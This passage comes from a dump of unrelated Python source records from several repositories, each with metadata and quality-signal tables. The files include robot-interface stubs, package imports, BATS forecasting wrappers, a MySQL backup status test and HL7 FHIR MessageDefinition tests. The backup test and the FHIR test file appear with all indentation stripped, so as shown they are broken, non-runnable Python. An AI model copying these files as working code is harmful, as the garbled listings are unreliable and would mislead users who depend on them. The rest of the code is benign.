| issues | jeffmahler/lfd | ecc6b934db098c0b1af9946454917b6dc911cb74 | BSD-2-Clause | null | null | null |
| forks | jeffmahler/lfd | ecc6b934db098c0b1af9946454917b6dc911cb74 | BSD-2-Clause | 13 | 2015-05-22T15:38:07.000Z | 2021-07-28T03:20:35.000Z |

```python
from __future__ import division


class RobotWorld(object):
    def __init__(self):
        raise NotImplementedError

    def observe_cloud(self):
        raise NotImplementedError

    def open_gripper(self):
        raise NotImplementedError

    def close_gripper(self):
        raise NotImplementedError

    def execute_trajectory(self):
        raise NotImplementedError


class RealRobotWorld(RobotWorld):
    def __init__(self):
        raise NotImplementedError

    def observe_cloud(self):
        raise NotImplementedError

    def open_gripper(self):
        raise NotImplementedError

    def close_gripper(self):
        raise NotImplementedError

    def execute_trajectory(self):
        raise NotImplementedError
```

- avg_line_length 22.411765 · max_line_length 33 · alphanum_fraction 0.677165
- quality signals (41 values, `qsc_code_num_words_quality_signal` through `qsc_codepython_frac_lines_print_quality_signal`): 68, 762, 7.294118, 0.294118, 0.181452, 0.564516, 0.5, 0.850806, 0.850806, 0.850806, 0.850806, 0.850806, 0.850806, 0, 0, 0.275591, 762, 33, 34, 23.090909, 0.898551, 0, 0, 0.869565, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0.434783, false, 0, 0.043478, 0, 0.565217, 0
- quality flags (41 values, `qsc_code_num_words` through `qsc_codepython_frac_lines_print`): 0, 0, 0, null, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0
- effective 0 · hits 11
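`RobotWorld` is a pure interface: every method raises `NotImplementedError` until a backend fills it in. A hypothetical in-memory fake, useful for unit tests and not part of the lfd codebase, might look like this (the `trajectory` parameter is an assumption — the interface above takes no arguments):

```python
class FakeRobotWorld(RobotWorld):
    """Hypothetical test double for the RobotWorld interface."""

    def __init__(self):
        # Override the base __init__, which raises NotImplementedError.
        self.gripper_open = False
        self.executed = []

    def observe_cloud(self):
        return []  # pretend the sensor saw an empty point cloud

    def open_gripper(self):
        self.gripper_open = True

    def close_gripper(self):
        self.gripper_open = False

    def execute_trajectory(self, trajectory=None):
        self.executed.append(trajectory)  # record instead of moving a robot
```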
**Record 6: `refactorings/move_class.py`** (Python · `.py` · 105 bytes · hexsha `f0fbfdbf43c412792303539c3d091977f426df23`)

| group | repo | head hexsha | licenses | count | first event | last event |
|---|---|---|---|---|---|---|
| stars | armingh2000/CodART | 4a097ef97a927553dcecddeca757c52e2c834db6 | MIT | null | null | null |
| issues | armingh2000/CodART | 4a097ef97a927553dcecddeca757c52e2c834db6 | MIT | null | null | null |
| forks | armingh2000/CodART | 4a097ef97a927553dcecddeca757c52e2c834db6 | MIT | 1 | 2021-01-30T09:28:54.000Z | 2021-01-30T09:28:54.000Z |

```python
from gen.java9 import Java9_v2Listener


class MoveClassRefactoringListener(Java9_v2Listener):
    pass
```

- avg_line_length 15 · max_line_length 53 · alphanum_fraction 0.828571
- quality signals (41 values, `qsc_code_num_words_quality_signal` through `qsc_codepython_frac_lines_print_quality_signal`): 11, 105, 7.727273, 0.727273, 0.352941, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.054945, 0.133333, 105, 6, 54, 17.5, 0.879121, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, true, 0.333333, 0.333333, 0, 0.666667, 0
- quality flags (41 values, `qsc_code_num_words` through `qsc_codepython_frac_lines_print`): 1, 0, 0, null, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 0
- effective 0 · hits 7
**Record 7: `python/src/nnabla/experimental/graph_converters/__init__.py`** (Python · `.py` · 229 bytes · hexsha `9be38005f85b724ee668a6d85efc7fe7470bf5eb`)

| group | repo | head hexsha | licenses | count | first event | last event |
|---|---|---|---|---|---|---|
| stars | syoyo/nnabla | b776b68dcdffe894cac1233dfd07c301415cc0fb | Apache-2.0 | 1 | 2020-08-03T12:49:19.000Z | 2020-08-03T12:49:19.000Z |
| issues | langbin2014/nnabla | e94bac5bed65337010e2ac07a5937fb862ab2dd8 | Apache-2.0 | 1 | 2020-11-09T07:33:29.000Z | 2020-11-09T07:33:29.000Z |
| forks | langbin2014/nnabla | e94bac5bed65337010e2ac07a5937fb862ab2dd8 | Apache-2.0 | null | null | null |

```python
from .helpers import *
from .batch_normalization_folded import *
from .batch_normalization_linear import *
from .fixed_point_activation import *
from .fixed_point_weight import *
from .identity import *
from .sequential import *
```

- avg_line_length 28.625 · max_line_length 41 · alphanum_fraction 0.816594
- quality signals (41 values, `qsc_code_num_words_quality_signal` through `qsc_codepython_frac_lines_print_quality_signal`): 29, 229, 6.172414, 0.448276, 0.335196, 0.167598, 0.312849, 0, 0, 0, 0, 0, 0, 0, 0, 0.122271, 229, 7, 42, 32.714286, 0.890547, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, true, 0, 1, 0, 1, 0
- quality flags (41 values, `qsc_code_num_words` through `qsc_codepython_frac_lines_print`): 1, 0, 0, null, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0
- effective 0 · hits 7
**Record 8: `tests/unit/status/mysql_status/test_str.py`** (Python · `.py` · 3,167 bytes · hexsha `9bf95c2dd4ab726163c4db8c3f7da126ebc35cd4`)

| group | repo | head hexsha | licenses | count | first event | last event |
|---|---|---|---|---|---|---|
| stars | denssk/backup | 292d5f1b1a3765ce0ea8d3cab8bd1ae0c583f72e | Apache-2.0 | 1 | 2019-03-22T00:04:40.000Z | 2019-03-22T00:04:40.000Z |
| issues | denssk/backup | 292d5f1b1a3765ce0ea8d3cab8bd1ae0c583f72e | Apache-2.0 | 1 | 2021-04-30T20:47:57.000Z | 2021-04-30T20:47:57.000Z |
| forks | denssk/backup | 292d5f1b1a3765ce0ea8d3cab8bd1ae0c583f72e | Apache-2.0 | 1 | 2019-09-17T08:32:52.000Z | 2019-09-17T08:32:52.000Z |

```python
from twindb_backup.status.mysql_status import MySQLStatus
def test_str_old(deprecated_status_raw_content):
status = MySQLStatus(deprecated_status_raw_content)
expected = '{"monthly": {}, "hourly": {"master1/hourly/mysql/mysql-2018-03-28_04_11_16.xbstream.gz": {"galera": false, "binlog": "mysql-bin.000001", "run_type": "hourly", "name": "mysql-2018-03-28_04_11_16.xbstream.gz", "parent": "master1/daily/mysql/mysql-2018-03-28_04_09_53.xbstream.gz", "lsn": 19903207, "type": "incremental", "backup_finished": 1522210295, "wsrep_provider_version": null, "host": "master1", "backup_started": 1522210276, "position": 46855, "config": [{"/etc/my.cnf": "W215c3FsZF0KZGF0YWRpcj0vdmFyL2xpYi9teXNxbApzb2NrZXQ9L3Zhci9saWIvbXlzcWwvbXlzcWwuc29jawp1c2VyPW15c3FsCiMgRGlzYWJsaW5nIHN5bWJvbGljLWxpbmtzIGlzIHJlY29tbWVuZGVkIHRvIHByZXZlbnQgYXNzb3J0ZWQgc2VjdXJpdHkgcmlza3MKc3ltYm9saWMtbGlua3M9MAoKc2VydmVyX2lkPTEwMApndGlkX21vZGU9T04KbG9nLWJpbj1teXNxbC1iaW4KbG9nLXNsYXZlLXVwZGF0ZXMKZW5mb3JjZS1ndGlkLWNvbnNpc3RlbmN5CgpbbXlzcWxkX3NhZmVdCmxvZy1lcnJvcj0vdmFyL2xvZy9teXNxbGQubG9nCnBpZC1maWxlPS92YXIvcnVuL215c3FsZC9teXNxbGQucGlkCg=="}]}}, "yearly": {}, "daily": {"master1/daily/mysql/mysql-2018-03-28_04_09_53.xbstream.gz": {"galera": false, "binlog": "mysql-bin.000001", "run_type": "daily", "name": "mysql-2018-03-28_04_09_53.xbstream.gz", "parent": null, "lsn": 19903199, "type": "full", "backup_finished": 1522210200, "wsrep_provider_version": null, "host": "master1", "backup_started": 1522210193, "position": 46855, "config": [{"/etc/my.cnf": "W215c3FsZF0KZGF0YWRpcj0vdmFyL2xpYi9teXNxbApzb2NrZXQ9L3Zhci9saWIvbXlzcWwvbXlzcWwuc29jawp1c2VyPW15c3FsCiMgRGlzYWJsaW5nIHN5bWJvbGljLWxpbmtzIGlzIHJlY29tbWVuZGVkIHRvIHByZXZlbnQgYXNzb3J0ZWQgc2VjdXJpdHkgcmlza3MKc3ltYm9saWMtbGlua3M9MAoKc2VydmVyX2lkPTEwMApndGlkX21vZGU9T04KbG9nLWJpbj1teXNxbC1iaW4KbG9nLXNsYXZlLXVwZGF0ZXMKZW5mb3JjZS1ndGlkLWNvbnNpc3RlbmN5CgpbbXlzcWxkX3NhZmVdCmxvZy1lcnJvcj0vdmFyL2xvZy9teXNxbGQubG9nCnBpZC1maWxlPS92YXIvcnVuL215c3FsZC9teXNxbGQucGlkCg=="}]}}, "weekly": {}}'
assert str(status) == expected
def test_str_new(status_raw_content):
status = MySQLStatus(status_raw_content)
expected = '{"monthly": {}, "hourly": {"master1/hourly/mysql/mysql-2018-03-28_04_11_16.xbstream.gz": {"galera": false, "binlog": "mysql-bin.000001", "run_type": "hourly", "name": "mysql-2018-03-28_04_11_16.xbstream.gz", "parent": "master1/daily/mysql/mysql-2018-03-28_04_09_53.xbstream.gz", "lsn": 19903207, "type": "incremental", "backup_finished": 1522210295, "wsrep_provider_version": null, "host": "master1", "backup_started": 1522210276, "position": 46855, "config": [{"/etc/my.cnf": "W215c3FsZF0KZGF0YWRpcj0vdmFyL2xpYi9teXNxbApzb2NrZXQ9L3Zhci9saWIvbXlzcWwvbXlzcWwuc29jawp1c2VyPW15c3FsCiMgRGlzYWJsaW5nIHN5bWJvbGljLWxpbmtzIGlzIHJlY29tbWVuZGVkIHRvIHByZXZlbnQgYXNzb3J0ZWQgc2VjdXJpdHkgcmlza3MKc3ltYm9saWMtbGlua3M9MAoKc2VydmVyX2lkPTEwMApndGlkX21vZGU9T04KbG9nLWJpbj1teXNxbC1iaW4KbG9nLXNsYXZlLXVwZGF0ZXMKZW5mb3JjZS1ndGlkLWNvbnNpc3RlbmN5CgpbbXlzcWxkX3NhZmVdCmxvZy1lcnJvcj0vdmFyL2xvZy9teXNxbGQubG9nCnBpZC1maWxlPS92YXIvcnVuL215c3FsZC9teXNxbGQucGlkCg=="}]}}, "yearly": {}, "daily": {}, "weekly": {}}'
assert str(status) == expected
```

- avg_line_length 197.9375 · max_line_length 1845 · alphanum_fraction 0.825703
- quality signals (41 values, `qsc_code_num_words_quality_signal` through `qsc_codepython_frac_lines_print_quality_signal`): 244, 3167, 10.491803, 0.266393, 0.028125, 0.034375, 0.040625, 0.935938, 0.8875, 0.885938, 0.698047, 0.679297, 0.667969, 0, 0.142525, 0.049574, 3167, 15, 1846, 211.133333, 0.707973, 0, 0, 0.222222, 0, 0.222222, 0.886959, 0.596464, 0, 0, 0, 0, 0.222222, 1, 0.222222, false, 0, 0.111111, 0, 0.333333, 0
- quality flags (41 values, `qsc_code_num_words` through `qsc_codepython_frac_lines_print`): 0, 0, 0, null, 0, 0, 0, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, null, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0
- effective 0 · hits 11
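The `config` entries inside the expected status string are base64-encoded `my.cnf` contents. A quick way to sanity-check what such a blob holds — this just decodes the string and does not depend on twindb_backup (`expected` here refers to the value assembled in `test_str_old` above):

```python
import base64
import json

status = json.loads(expected)  # the expected status is itself valid JSON
key = "master1/daily/mysql/mysql-2018-03-28_04_09_53.xbstream.gz"
blob = status["daily"][key]["config"][0]["/etc/my.cnf"]
print(base64.b64decode(blob).decode("utf-8"))  # original /etc/my.cnf text
```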
**Record 9: `app/oauth/__init__.py`** (Python · `.py` · 150 bytes · hexsha `5002522ee09d8aeb626f11de5b128ddd46a2e9a6`)

| group | repo | head hexsha | licenses | count | first event | last event |
|---|---|---|---|---|---|---|
| stars | liam-carswell/flask-dance-multi-provider | 86e66154ea83963d6b729c0cc5b8a45ba2555ee8 | MIT | null | null | null |
| issues | liam-carswell/flask-dance-multi-provider | 86e66154ea83963d6b729c0cc5b8a45ba2555ee8 | MIT | null | null | null |
| forks | liam-carswell/flask-dance-multi-provider | 86e66154ea83963d6b729c0cc5b8a45ba2555ee8 | MIT | null | null | null |

```python
from .github import blueprint as github_blueprint
from .google import blueprint as google_blueprint
from .strava import blueprint as strava_blueprint
```

- avg_line_length 37.5 · max_line_length 49 · alphanum_fraction 0.86
- quality signals (41 values, `qsc_code_num_words_quality_signal` through `qsc_codepython_frac_lines_print_quality_signal`): 21, 150, 6, 0.333333, 0.357143, 0.404762, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.12, 150, 3, 50, 50, 0.954545, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, true, 0, 1, 0, 1, 1
- quality flags (41 values, `qsc_code_num_words` through `qsc_codepython_frac_lines_print`): 1, 1, 0, null, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 1
- effective 0 · hits 8
**Record 10: `timemachines/skaters/bats/allbatsskaters.py`** (Python · `.py` · 3,398 bytes · hexsha `5045dd518db41d227f64eeee9e15bd9bb294d8cd`)

| group | repo | head hexsha | licenses | count | first event | last event |
|---|---|---|---|---|---|---|
| stars | iklasky/timemachines | 1820fa9453d31d4daaeff75274a935c7455febe3 | MIT | 253 | 2021-01-08T17:33:30.000Z | 2022-03-21T17:32:36.000Z |
| issues | iklasky/timemachines | 1820fa9453d31d4daaeff75274a935c7455febe3 | MIT | 65 | 2021-01-20T16:43:35.000Z | 2022-03-30T19:07:22.000Z |
| forks | iklasky/timemachines | 1820fa9453d31d4daaeff75274a935c7455febe3 | MIT | 28 | 2021-02-04T14:58:30.000Z | 2022-01-17T04:35:17.000Z |

```python
from timemachines.skatertools.utilities.conventions import Y_TYPE, A_TYPE, R_TYPE, E_TYPE, T_TYPE
from timemachines.skaters.bats.batsinclusion import using_bats

if using_bats:
    from timemachines.skaters.bats.batsfactory import bats_factory

    def bats_fast(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None):
        return bats_factory(y=y, s=s, k=k, a=a, t=t, e=e, use_trend=False, use_arma_errors=False, use_box_cox=False)

    def bats_trendy(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None):
        return bats_factory(y=y, s=s, k=k, a=a, t=t, e=e, use_trend=True, use_arma_errors=False, use_box_cox=False)

    def bats_damped(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None):
        return bats_factory(y=y, s=s, k=k, a=a, t=t, e=e, use_damped_trend=True, use_arma_errors=False, use_box_cox=False)

    def bats_arma(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None):
        return bats_factory(y=y, s=s, k=k, a=a, t=t, e=e, use_trend=False, use_arma_errors=True, use_box_cox=False)

    def bats_arma_bc(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None):
        return bats_factory(y=y, s=s, k=k, a=a, t=t, e=e, use_trend=False, use_arma_errors=True, use_box_cox=True)

    def bats_damped_arma(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None):
        return bats_factory(y=y, s=s, k=k, a=a, t=t, e=e, use_damped_trend=True, use_arma_errors=True, use_box_cox=False)

    def bats_trendy_arma(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None):
        return bats_factory(y=y, s=s, k=k, a=a, t=t, e=e, use_trend=True, use_arma_errors=True, use_box_cox=False)

    def bats_bc(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None):
        return bats_factory(y=y, s=s, k=k, a=a, t=t, e=e, use_trend=False, use_arma_errors=False, use_box_cox=True)

    def bats_trendy_bc(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None):
        return bats_factory(y=y, s=s, k=k, a=a, t=t, e=e, use_trend=True, use_arma_errors=False, use_box_cox=True)

    def bats_damped_bc(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None):
        return bats_factory(y=y, s=s, k=k, a=a, t=t, e=e, use_damped_trend=True, use_arma_errors=False, use_box_cox=True)

    def bats_damped_arma_bc(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None):
        return bats_factory(y=y, s=s, k=k, a=a, t=t, e=e, use_damped_trend=True, use_arma_errors=True, use_box_cox=True)

    def bats_trendy_arma_bc(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None):
        return bats_factory(y=y, s=s, k=k, a=a, t=t, e=e, use_trend=True, use_arma_errors=True, use_box_cox=True)

    BATS_SKATERS = [bats_fast, bats_arma, bats_bc, bats_arma_bc,
                    bats_trendy, bats_trendy_arma, bats_trendy_bc, bats_trendy_arma_bc,
                    bats_damped, bats_damped_arma, bats_damped_bc, bats_damped_arma_bc]
else:
    BATS_SKATERS = []
```

- avg_line_length 57.59322 · max_line_length 122 · alphanum_fraction 0.654797
- quality signals (41 values, `qsc_code_num_words_quality_signal` through `qsc_codepython_frac_lines_print_quality_signal`): 698, 3398, 2.918338, 0.054441, 0.188513, 0.035346, 0.041237, 0.814433, 0.814433, 0.814433, 0.802651, 0.799705, 0.799705, 0, 0, 0.201589, 3398, 59, 123, 57.59322, 0.750829, 0, 0, 0.057143, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0.342857, false, 0, 0.085714, 0.342857, 0.771429, 0
- quality flags (41 values, `qsc_code_num_words` through `qsc_codepython_frac_lines_print`): 0, 0, 0, null, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 0
- effective 0 · hits 9
**Record 11: `app/listeners/__init__.py`** (Python · `.py` · 167 bytes · hexsha `5060eafbe4df6ee666240bdb01706082c4b9d3e0`)

| group | repo | head hexsha | licenses | count | first event | last event |
|---|---|---|---|---|---|---|
| stars | LuoLuo0101/cognition-stock | 62201106fbb50635ca731921c159a700bc36ebb4 | MIT | null | null | null |
| issues | LuoLuo0101/cognition-stock | 62201106fbb50635ca731921c159a700bc36ebb4 | MIT | null | null | null |
| forks | LuoLuo0101/cognition-stock | 62201106fbb50635ca731921c159a700bc36ebb4 | MIT | null | null | null |

```python
from sanic import Sanic

from app.listeners.redis_listeners import configure_redis_listeners


def configure_listeners(app: Sanic):
    configure_redis_listeners(app)
```

- avg_line_length 20.875 · max_line_length 67 · alphanum_fraction 0.838323
- quality signals (41 values, `qsc_code_num_words_quality_signal` through `qsc_codepython_frac_lines_print_quality_signal`): 22, 167, 6.090909, 0.363636, 0.313433, 0.343284, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.113772, 167, 7, 68, 23.857143, 0.905405, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0.25, false, 0, 0.5, 0, 0.75, 0
- quality flags (41 values, `qsc_code_num_words` through `qsc_codepython_frac_lines_print`): 1, 0, 0, null, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0
- effective 0 · hits 7
**Record 12: `fhir/resources/STU3/tests/test_messagedefinition.py`** (Python · `.py` · 12,059 bytes · hexsha `ac95e1c12984d21e7043e2f9d40e404e892a0a65`)

| group | repo | head hexsha | licenses | count | first event | last event |
|---|---|---|---|---|---|---|
| stars | mmabey/fhir.resources | cc73718e9762c04726cd7de240c8f2dd5313cbe1 | BSD-3-Clause | null | null | null |
| issues | mmabey/fhir.resources | cc73718e9762c04726cd7de240c8f2dd5313cbe1 | BSD-3-Clause | null | null | null |
| forks | mmabey/fhir.resources | cc73718e9762c04726cd7de240c8f2dd5313cbe1 | BSD-3-Clause | null | null | null |

```python
# -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/MessageDefinition
Release: STU3
Version: 3.0.2
Revision: 11917
Last updated: 2019-10-24T11:53:00+11:00
"""
import io
import json
import os
import unittest
import pytest
from .. import messagedefinition
from ..fhirdate import FHIRDate
from .fixtures import force_bytes
@pytest.mark.usefixtures("base_settings")
class MessageDefinitionTests(unittest.TestCase):
def instantiate_from(self, filename):
datadir = os.environ.get("FHIR_UNITTEST_DATADIR") or ""
with io.open(os.path.join(datadir, filename), "r", encoding="utf-8") as handle:
js = json.load(handle)
self.assertEqual("MessageDefinition", js["resourceType"])
return messagedefinition.MessageDefinition(js)
def testMessageDefinition1(self):
inst = self.instantiate_from("messagedefinition-example.json")
self.assertIsNotNone(
inst, "Must have instantiated a MessageDefinition instance"
)
self.implMessageDefinition1(inst)
js = inst.as_json()
self.assertEqual("MessageDefinition", js["resourceType"])
inst2 = messagedefinition.MessageDefinition(js)
self.implMessageDefinition1(inst2)
def implMessageDefinition1(self, inst):
self.assertEqual(force_bytes(inst.category), force_bytes("Notification"))
self.assertEqual(
force_bytes(inst.contact[0].telecom[0].system), force_bytes("url")
)
self.assertEqual(
force_bytes(inst.contact[0].telecom[0].value), force_bytes("http://hl7.org")
)
self.assertEqual(inst.date.date, FHIRDate("2016-11-09").date)
self.assertEqual(inst.date.as_json(), "2016-11-09")
self.assertEqual(
force_bytes(inst.event.code), force_bytes("communication-request")
)
self.assertEqual(
force_bytes(inst.event.system),
force_bytes("http://hl7.org/fhir/message-events"),
)
self.assertTrue(inst.experimental)
self.assertEqual(force_bytes(inst.id), force_bytes("example"))
self.assertEqual(force_bytes(inst.name), force_bytes("EXAMPLE"))
self.assertEqual(
force_bytes(inst.publisher), force_bytes("Health Level Seven, Int'l")
)
self.assertEqual(
force_bytes(inst.purpose),
force_bytes("Defines a base example for other MessageDefintion instances."),
)
self.assertFalse(inst.responseRequired)
self.assertEqual(force_bytes(inst.status), force_bytes("draft"))
self.assertEqual(
force_bytes(inst.text.div),
force_bytes(
'<div xmlns="http://www.w3.org/1999/xhtml">Message definition base example</div>'
),
)
self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
self.assertEqual(
force_bytes(inst.title), force_bytes("Message definition base example")
)
self.assertEqual(
force_bytes(inst.url),
force_bytes("http://hl7.org/fhir/MessageDefinition/example"),
)
def testMessageDefinition2(self):
inst = self.instantiate_from("messagedefinition-patient-link-notification.json")
self.assertIsNotNone(
inst, "Must have instantiated a MessageDefinition instance"
)
self.implMessageDefinition2(inst)
js = inst.as_json()
self.assertEqual("MessageDefinition", js["resourceType"])
inst2 = messagedefinition.MessageDefinition(js)
self.implMessageDefinition2(inst2)
def implMessageDefinition2(self, inst):
self.assertEqual(
force_bytes(inst.allowedResponse[0].situation),
force_bytes(
"Optional response message that may provide additional information"
),
)
self.assertEqual(force_bytes(inst.category), force_bytes("Notification"))
self.assertEqual(
force_bytes(inst.contact[0].telecom[0].system), force_bytes("url")
)
self.assertEqual(
force_bytes(inst.contact[0].telecom[0].value), force_bytes("http://hl7.org")
)
self.assertEqual(force_bytes(inst.copyright), force_bytes("© HL7.org 2011+"))
self.assertEqual(inst.date.date, FHIRDate("2017-02-03").date)
self.assertEqual(inst.date.as_json(), "2017-02-03")
self.assertEqual(
force_bytes(inst.description),
force_bytes(
"Notification of two patient records that represent the same individual that require an established linkage."
),
)
self.assertEqual(force_bytes(inst.event.code), force_bytes("patient-link"))
self.assertEqual(
force_bytes(inst.event.system),
force_bytes("http://hl7.org/fhir/message-events"),
)
self.assertTrue(inst.experimental)
self.assertEqual(force_bytes(inst.focus[0].code), force_bytes("Patient"))
self.assertEqual(force_bytes(inst.focus[0].max), force_bytes("2"))
self.assertEqual(inst.focus[0].min, 2)
self.assertEqual(force_bytes(inst.id), force_bytes("patient-link-notification"))
self.assertEqual(
force_bytes(inst.identifier.system), force_bytes("urn:ietf:rfc:3986")
)
self.assertEqual(
force_bytes(inst.identifier.value),
force_bytes("urn:oid:1.3.6.1.4.1.21367.2005.3.7.9878"),
)
self.assertEqual(
force_bytes(inst.jurisdiction[0].coding[0].code), force_bytes("US")
)
self.assertEqual(
force_bytes(inst.jurisdiction[0].coding[0].display),
force_bytes("United States of America (the)"),
)
self.assertEqual(
force_bytes(inst.jurisdiction[0].coding[0].system),
force_bytes("urn:iso:std:iso:3166"),
)
self.assertEqual(
force_bytes(inst.name), force_bytes("PATIENT-LINK-NOTIFICATION")
)
self.assertEqual(
force_bytes(inst.publisher), force_bytes("Health Level Seven, Int'l")
)
self.assertEqual(
force_bytes(inst.purpose),
force_bytes(
"Notifies recipient systems that two patients have been 'linked' - meaning they represent the same individual"
),
)
self.assertFalse(inst.responseRequired)
self.assertEqual(force_bytes(inst.status), force_bytes("draft"))
self.assertEqual(
force_bytes(inst.text.div),
force_bytes(
'<div xmlns="http://www.w3.org/1999/xhtml">Link Patients Notification</div>'
),
)
self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
self.assertEqual(
force_bytes(inst.title), force_bytes("Link Patients Notification")
)
self.assertEqual(
force_bytes(inst.url),
force_bytes(
"http://hl7.org/fhir/MessageDefinition/patient-link-notification"
),
)
self.assertEqual(
force_bytes(inst.useContext[0].code.code), force_bytes("focus")
)
self.assertEqual(
force_bytes(inst.useContext[0].code.system),
force_bytes("http://hl7.org/fhir/usage-context-type"),
)
self.assertEqual(
force_bytes(inst.useContext[0].valueCodeableConcept.coding[0].code),
force_bytes("positive"),
)
self.assertEqual(
force_bytes(inst.useContext[0].valueCodeableConcept.coding[0].system),
force_bytes("http://hl7.org/fhir/variant-state"),
)
self.assertEqual(force_bytes(inst.version), force_bytes("1"))
def testMessageDefinition3(self):
inst = self.instantiate_from("messagedefinition-patient-link-response.json")
self.assertIsNotNone(
inst, "Must have instantiated a MessageDefinition instance"
)
self.implMessageDefinition3(inst)
js = inst.as_json()
self.assertEqual("MessageDefinition", js["resourceType"])
inst2 = messagedefinition.MessageDefinition(js)
self.implMessageDefinition3(inst2)
def implMessageDefinition3(self, inst):
self.assertEqual(force_bytes(inst.category), force_bytes("Consequence"))
self.assertEqual(
force_bytes(inst.contact[0].telecom[0].system), force_bytes("url")
)
self.assertEqual(
force_bytes(inst.contact[0].telecom[0].value), force_bytes("http://hl7.org")
)
self.assertEqual(force_bytes(inst.copyright), force_bytes("© HL7.org 2011+"))
self.assertEqual(inst.date.date, FHIRDate("2017-02-03").date)
self.assertEqual(inst.date.as_json(), "2017-02-03")
self.assertEqual(
force_bytes(inst.description),
force_bytes("Optional response to a patient link notification."),
)
self.assertEqual(force_bytes(inst.event.code), force_bytes("patient-link"))
self.assertEqual(
force_bytes(inst.event.system),
force_bytes("http://hl7.org/fhir/message-events"),
)
self.assertTrue(inst.experimental)
self.assertEqual(force_bytes(inst.focus[0].code), force_bytes("Patient"))
self.assertEqual(force_bytes(inst.focus[0].max), force_bytes("2"))
self.assertEqual(inst.focus[0].min, 2)
self.assertEqual(force_bytes(inst.id), force_bytes("patient-link-response"))
self.assertEqual(
force_bytes(inst.identifier.system), force_bytes("urn:ietf:rfc:3986")
)
self.assertEqual(
force_bytes(inst.identifier.value),
force_bytes("urn:oid:1.3.6.1.4.1.21367.2005.3.7.9879"),
)
self.assertEqual(
force_bytes(inst.jurisdiction[0].coding[0].code), force_bytes("US")
)
self.assertEqual(
force_bytes(inst.jurisdiction[0].coding[0].display),
force_bytes("United States of America (the)"),
)
self.assertEqual(
force_bytes(inst.jurisdiction[0].coding[0].system),
force_bytes("urn:iso:std:iso:3166"),
)
self.assertEqual(force_bytes(inst.name), force_bytes("PATIENT-LINK-RESPONSE"))
self.assertEqual(
force_bytes(inst.publisher), force_bytes("Health Level Seven, Int'l")
)
self.assertEqual(
force_bytes(inst.purpose),
force_bytes(
"Optional response message that may provide additional information on the outcome of the patient link operation."
),
)
self.assertFalse(inst.responseRequired)
self.assertEqual(force_bytes(inst.status), force_bytes("draft"))
self.assertEqual(
force_bytes(inst.text.div),
force_bytes(
'<div xmlns="http://www.w3.org/1999/xhtml">Link Patients Response</div>'
),
)
self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
self.assertEqual(force_bytes(inst.title), force_bytes("Link Patients Response"))
self.assertEqual(
force_bytes(inst.url),
force_bytes("http://hl7.org/fhir/MessageDefinition/patient-link-response"),
)
self.assertEqual(
force_bytes(inst.useContext[0].code.code), force_bytes("focus")
)
self.assertEqual(
force_bytes(inst.useContext[0].code.system),
force_bytes("http://hl7.org/fhir/usage-context-type"),
)
self.assertEqual(
force_bytes(inst.useContext[0].valueCodeableConcept.coding[0].code),
force_bytes("positive"),
)
self.assertEqual(
force_bytes(inst.useContext[0].valueCodeableConcept.coding[0].system),
force_bytes("http://hl7.org/fhir/variant-state"),
)
